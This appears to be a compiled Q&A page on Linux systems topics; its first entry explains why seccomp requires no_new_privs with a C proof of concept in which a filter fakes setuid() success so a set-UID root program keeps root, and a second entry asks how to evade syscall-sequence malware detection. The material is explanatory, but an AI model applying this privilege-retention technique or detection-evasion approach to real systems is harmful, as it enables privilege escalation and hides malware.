Why is the no_new_privs bit required with seccomp? Example of a theoretical exploit

I've read that before using seccomp filter mode you have to set this bit, because it guarantees that a child process can't be executed with greater privileges than its parent's. But I still can't figure out an exploitation example. Could you show me one?
THEORETICAL SCENARIO: I have a program which can set seccomp filter mode without setting the no_new_privs bit.
GOAL: show a program which exploits this.
From man seccomp:
This requirement ensures that an unprivileged process cannot apply a malicious filter and then invoke a set-user-ID or other privileged program using execve(2), thus potentially compromising that program. (Such a malicious filter might, for example, cause an attempt to use setuid(2) to set the caller's user IDs to nonzero values to instead return 0 without actually making the system call. Thus, the program might be tricked into retaining superuser privileges in circumstances where it is possible to influence it to do dangerous things because it did not actually drop privileges.)
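To make the scenario concrete, here is a minimal sketch of such a malicious filter, assuming (per the theoretical scenario above) a process that is somehow able to install a filter without setting no_new_privs. In practice the kernel refuses the prctl() unless the caller has CAP_SYS_ADMIN, and that refusal is exactly the safeguard in question. /usr/bin/victim-suid is a hypothetical set-user-ID-root binary that "drops" privileges with setuid(getuid()) before doing privileged work.

#include <stdio.h>
#include <stddef.h>
#include <unistd.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <linux/filter.h>
#include <linux/seccomp.h>

int main(void) {
    struct sock_filter filter[] = {
        /* Load the syscall number (a real filter must also check
           seccomp_data.arch; omitted here for brevity). */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS,
                 offsetof(struct seccomp_data, nr)),
        /* setuid? Skip the call and fake success: SECCOMP_RET_ERRNO
           with errno 0 makes the syscall return 0 without running. */
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_setuid, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | 0),
        /* Allow everything else. */
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog = {
        .len = sizeof(filter) / sizeof(filter[0]),
        .filter = filter,
    };

    /* Without PR_SET_NO_NEW_PRIVS this prctl fails unless the caller
       has CAP_SYS_ADMIN - that refusal is the whole point. */
    if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) != 0) {
        perror("prctl(PR_SET_SECCOMP)");
        return 1;
    }

    /* The filter survives execve(). The set-UID-root victim's call to
       setuid(getuid()) appears to succeed, so it believes it is now
       unprivileged while still running as root. */
    execl("/usr/bin/victim-suid", "victim-suid", (char *)NULL);  /* hypothetical binary */
    perror("execl");
    return 1;
}

With the filter inherited across execve(), the victim's setuid() returns 0 but never reaches the kernel, so the victim keeps running with effective UID 0.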

Related

For black-box analysis of the outcome of a system call, is a complete comparison of before-and-after forensic system images the right way to measure?

I'm doing x86-64 binary obfuscation research, and fundamentally one of the key challenges in the offense/defense cat-and-mouse game of executing a known-bad program and detecting it (even when obfuscated) is system call sequence analysis.
Put simply, obfuscation is just achieving the same effects on the system through a different sequence of instructions and memory states in order to minimize observable analysis channels. But at the end of the day, you need to execute certain system calls in a certain order to achieve certain input / output behaviors for a program.
Or do you? The question I want to study is this: Could the intended outcome of some or all system calls be achieved through different system calls? Let's say system call D, when executed 3 times consecutively, with certain parameters can be heuristically attributed to malicious behavior. If system calls A, B, and C could be found to achieve the same effect (perhaps in addition to other side-effects) desired from system call D, then it would be possible to evade kernel hooks designed to trace and heuristically analyze system call sequences.
To determine how often this system call outcome overlap exists in a given OS, I don't want to use documentation and manual analysis for a few reasons:
undocumented behavior
lots of work, repeated for every OS and even different versions
So rather, I'm interested in performing black-box analysis to fuzz system calls with various arguments and observing the effects. My problem is I'm not sure how to measure the effects. Once I execute a system call, what mechanism could I use to observe exactly which changes result from it? Is there any reliable way, aside from completely iterating over entire forensic snapshots of the machine before and after?
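As a cheaper alternative to diffing full forensic images, one option is to diff only the narrow slices of state a given syscall can plausibly touch. A toy sketch of that idea, assuming a hypothetical probe file /tmp/syscall-probe: invoke the syscall under test through syscall(2) and compare one file's metadata before and after.

#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/syscall.h>

/* Toy harness: observe one syscall's effect on one file's metadata,
   instead of diffing whole forensic images. A real fuzzer would widen
   the observation step (open fds, /proc, mounts, ...) as needed. */
static void snapshot(const char *path, struct stat *out) {
    if (stat(path, out) != 0)
        memset(out, 0, sizeof(*out));
}

int main(void) {
    const char *target = "/tmp/syscall-probe";  /* hypothetical probe file */
    int fd = open(target, O_CREAT | O_WRONLY, 0644);
    if (fd >= 0) close(fd);

    struct stat before, after;
    snapshot(target, &before);

    /* Invoke the syscall under test directly, bypassing libc wrappers
       that might rewrite arguments: here the raw 3-argument fchmodat. */
    long ret = syscall(SYS_fchmodat, AT_FDCWD, target, 0600);
    int err = errno;

    snapshot(target, &after);

    if (ret == -1)
        printf("ret=-1 errno=%d (%s)\n", err, strerror(err));
    else
        printf("ret=%ld\n", ret);
    if (before.st_mode != after.st_mode)
        printf("mode changed: %o -> %o\n",
               before.st_mode & 07777, after.st_mode & 07777);
    return 0;
}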

bpf resource limit using setrlimit

When writing bpf programs, some online tutorials always use
struct rlimit rlim_new = {
    .rlim_cur = RLIM_INFINITY,
    .rlim_max = RLIM_INFINITY,
};
setrlimit(RLIMIT_MEMLOCK, &rlim_new);
to remove memory usage limitation for the bpf programs. This makes the program require root privilege. I wonder if there is something equivalent that does not require root privilege.
Thanks,
Peng.
Not possible
From man setrlimit:
The getrlimit() and setrlimit() system calls get and set resource limits respectively. Each resource has an associated soft and hard limit, as defined by the rlimit structure:
struct rlimit {
    rlim_t rlim_cur;  /* Soft limit */
    rlim_t rlim_max;  /* Hard limit (ceiling for rlim_cur) */
};
The soft limit is the value that the kernel enforces for the corresponding resource. The hard limit acts as a ceiling for the soft limit: an unprivileged process may only set its soft limit to a value in the range from 0 up to the hard limit, and (irreversibly) lower its hard limit. A privileged process (under Linux: one with the CAP_SYS_RESOURCE capability) may make arbitrary changes to either limit value.
As you can read, a non-root process (or rather, one without the relevant capability) can only lower its memory limit. This answers your question: there is no equivalent for unprivileged users. Which makes sense, because the purpose of the memory limit is to prevent unprivileged users from harming the system in the first place, and allowing them to bypass the limit would rather defeat that objective.
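You can observe the restriction directly. A small sketch that tries to raise the RLIMIT_MEMLOCK hard limit: without CAP_SYS_RESOURCE (and unless the hard limit is already infinite) the call fails with EPERM.

#include <stdio.h>
#include <sys/resource.h>

int main(void) {
    struct rlimit cur;
    if (getrlimit(RLIMIT_MEMLOCK, &cur) == 0)
        printf("hard limit now: %llu\n", (unsigned long long)cur.rlim_max);

    /* Raising the hard limit requires CAP_SYS_RESOURCE; without it
       (and unless rlim_max is already RLIM_INFINITY) this fails. */
    struct rlimit bumped = { .rlim_cur = RLIM_INFINITY,
                             .rlim_max = RLIM_INFINITY };
    if (setrlimit(RLIMIT_MEMLOCK, &bumped) != 0)
        perror("setrlimit(RLIMIT_MEMLOCK)");  /* expected: Operation not permitted */
    else
        puts("raised - process was privileged or limit already infinite");
    return 0;
}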
Seldom an issue
It is usually not an issue, because most eBPF-related operations require some privileges anyway. It used to be CAP_SYS_ADMIN; it is now a combination of CAP_SYS_ADMIN, CAP_BPF, CAP_NET_ADMIN and CAP_PERFMON, depending on the program types and features used. One notable exception is eBPF programs attached to network sockets, which may be attached without privileges, provided the kernel.unprivileged_bpf_disabled sysctl allows it and the program does not use forbidden features; see also this answer.
About to change
Note also that memory accounting for eBPF objects is changing: newer kernels (starting with 5.11) use cgroup-based (memcg) memory accounting instead of RLIMIT_MEMLOCK, so the call to setrlimit() for eBPF objects becomes obsolete there.
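A hedged version of the tutorial snippet that reflects this: attempt the bump, but treat failure as non-fatal, since on 5.11+ kernels with memcg-based accounting the limit no longer applies to eBPF objects. The function name bump_memlock_rlimit below is just a naming convention seen in examples, not a library API.

#include <stdio.h>
#include <sys/resource.h>

/* Try to lift RLIMIT_MEMLOCK for older (pre-5.11) kernels, but treat
   failure as non-fatal: on newer kernels memcg-based accounting makes
   the limit irrelevant for eBPF objects. */
static void bump_memlock_rlimit(void) {
    struct rlimit r = { RLIM_INFINITY, RLIM_INFINITY };
    if (setrlimit(RLIMIT_MEMLOCK, &r) != 0)
        fprintf(stderr, "note: could not raise RLIMIT_MEMLOCK; "
                        "fine on kernels >= 5.11 with memcg accounting\n");
}

int main(void) {
    bump_memlock_rlimit();
    /* ... set up and load BPF objects here ... */
    return 0;
}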

Parameter sniffing / bind peeking in PostgreSQL

The Prepare and Execute combination in PostgreSQL permits the use of bound parameters. However, Prepare does not produce a plan optimized for one set of parameter bindings that can then be reused with a different set of parameter bindings. Does anybody have pointers on implementing such functionality? With this, the plan would be optimized for the given set of parameter bindings but could be reused for another set. The plan might not be efficient for the subsequent set, but if the plan cost were recomputed using the new parameter bindings, it might be found to be efficient.
Reading and using parameter-binding values for cardinality estimation is called "parameter sniffing" in SQL Server and "bind peeking" in Oracle. Basically, has anybody done anything similar in PostgreSQL?
PostgreSQL uses a heuristic to decide whether to do "bind peeking". It peeks for the first five executions (I think it is five) of a prepared statement, and if none of those custom plans is expected to be better than the generic plan, it stops checking and uses the generic plan from then on.
Starting in v12, you can change this heuristic by setting plan_cache_mode.
Note that some drivers implement their own heuristics--just because you call the driver's prepare method doesn't mean it actually transmits this to the server as a PREPARE. It might instead stash the statement text away, wait until you execute, and then quote/escape your parameters and bundle them up with your previously pseudo-prepared statement and send them to the server in one packet. That is, they might treat the prepare/execute separation simply as a way to prevent SQL injections, not as a way to increase performance.
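For illustration, a minimal libpq sketch of an explicit server-side PREPARE/EXECUTE with plan_cache_mode (v12+). The connection string, the statement name by_id, and the table t are assumptions for the example; build with -lpq.

#include <stdio.h>
#include <libpq-fe.h>

int main(void) {
    /* Connection string is an assumption; adjust for your setup. */
    PGconn *conn = PQconnectdb("dbname=test");
    if (PQstatus(conn) != CONNECTION_OK) {
        fprintf(stderr, "%s", PQerrorMessage(conn));
        return 1;
    }

    /* v12+: force a fresh, parameter-specific ("peeked") plan on every
       execution instead of the default heuristic (plan_cache_mode = auto). */
    PQclear(PQexec(conn, "SET plan_cache_mode = force_custom_plan"));

    /* Explicit server-side PREPARE - this is the step a driver may or
       may not actually forward to the server. */
    PQclear(PQprepare(conn, "by_id",
                      "SELECT * FROM t WHERE id = $1", 1, NULL));

    const char *val = "42";  /* hypothetical binding */
    PGresult *res = PQexecPrepared(conn, "by_id", 1, &val,
                                   NULL, NULL, 0);
    printf("rows: %d\n", PQntuples(res));

    PQclear(res);
    PQfinish(conn);
    return 0;
}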

Operating System Deadlock

I am confused about the deadlock avoidance technique.
Could we achieve deadlock avoidance by adding more resources?
a) Yes
b) No
Deadlock is not a single well-defined scenario; you have to be more specific. For a "classical" deadlock as described in textbooks (two processes trying to access both the screen and the printer at the same time), adding resources does not count as an option, because the processes need those specific resources.
Of course, in this example, adding another printer would resolve the deadlock. But to extend the idea to software development, where a "resource" is something more abstract, like access to a certain variable, adding resources is not considered a valid option: if two processes need to share access to a variable, it is not possible to introduce another one without changing the behavior of the program.
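For concreteness, a minimal sketch of the classical two-resource deadlock in C with POSIX threads: two threads acquire the same two locks in opposite order, producing a circular wait. The lock names and the sleep() calls are illustrative choices, not part of any canonical example; build with -pthread.

#include <pthread.h>
#include <stdio.h>
#include <unistd.h>

/* Two locks standing in for two non-duplicable resources
   (e.g., two shared variables). */
static pthread_mutex_t a = PTHREAD_MUTEX_INITIALIZER;
static pthread_mutex_t b = PTHREAD_MUTEX_INITIALIZER;

static void *t1(void *arg) {
    (void)arg;
    pthread_mutex_lock(&a);
    sleep(1);                 /* widen the race window */
    pthread_mutex_lock(&b);   /* blocks forever once t2 holds b */
    pthread_mutex_unlock(&b);
    pthread_mutex_unlock(&a);
    return NULL;
}

static void *t2(void *arg) {
    (void)arg;
    pthread_mutex_lock(&b);   /* opposite acquisition order */
    sleep(1);
    pthread_mutex_lock(&a);
    pthread_mutex_unlock(&a);
    pthread_mutex_unlock(&b);
    return NULL;
}

int main(void) {
    pthread_t x, y;
    pthread_create(&x, NULL, t1, NULL);
    pthread_create(&y, NULL, t2, NULL);
    pthread_join(x, NULL);    /* never returns: circular wait */
    pthread_join(y, NULL);
    puts("unreachable");
    return 0;
}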

Importance of knowing if a standard library function is executing a system call

Is it actually important for a programmer to know if the standard library function he/she is using is actually executing a system call? If so, why?
Intuitively, I'm guessing the only thing that matters is knowing whether the general standard function is a library function or a system call itself. In other cases, I'm guessing there isn't much need to know whether a library function internally uses a system call?
It is not always possible to know (for sure) whether a library function wraps a system call. But one way or another, this knowledge can help improve the portability and/or efficiency of your program. In at least the following two cases, knowing the syscall-level behaviour of your program is helpful.
When your program is time-critical. Some system calls are expensive, and the library functions that wrap them are even more expensive. Time-critical tasks may therefore need to switch to equivalent functions that do not enter kernel space at all.
It is also worth noting the vsyscall (or vDSO) mechanism of Linux, which accelerates some system calls (e.g., gettimeofday) by mapping their implementations into user-space memory; see this for more details. A rough timing sketch follows this list.
When your program needs to be deployed to a restricted environment with system call auditing. For your program to survive such an environment, it may be necessary to profile it for potential policy violations; this is easier if you were aware of the restrictions when you wrote the program.
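As an illustration of the cost difference mentioned above, a sketch that times the library wrapper against a forced kernel entry. The iteration count and the use of clock_gettime() for measurement are arbitrary choices; on typical x86-64 Linux with glibc, gettimeofday() goes through the vDSO, so the second loop should be noticeably slower.

#include <stdio.h>
#include <unistd.h>
#include <time.h>
#include <sys/time.h>
#include <sys/syscall.h>

static double elapsed(struct timespec s, struct timespec e) {
    return (e.tv_sec - s.tv_sec) + (e.tv_nsec - s.tv_nsec) / 1e9;
}

int main(void) {
    enum { N = 1000000 };
    struct timeval tv;
    struct timespec s, e;

    clock_gettime(CLOCK_MONOTONIC, &s);
    for (int i = 0; i < N; i++)
        gettimeofday(&tv, NULL);               /* vDSO path (typically) */
    clock_gettime(CLOCK_MONOTONIC, &e);
    printf("library wrapper: %.3fs\n", elapsed(s, e));

    clock_gettime(CLOCK_MONOTONIC, &s);
    for (int i = 0; i < N; i++)
        syscall(SYS_gettimeofday, &tv, NULL);  /* forced kernel entry */
    clock_gettime(CLOCK_MONOTONIC, &e);
    printf("raw syscall:     %.3fs\n", elapsed(s, e));
    return 0;
}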
Sometimes it might be important, and sometimes it isn't. I don't think there's any universal answer to this question. Reasons I can think of why it might matter in some contexts: the system call may require permissions the user might not have; in performance-critical code a system call might be too heavyweight; if you're writing a signal handler, where only async-signal-safe functions (mostly thin system-call wrappers) may be used; if it might consume some system resource (e.g., reading from /dev/random for every random number could drain the entropy pool - you'd want to know whether that is going to happen every time you call rand()).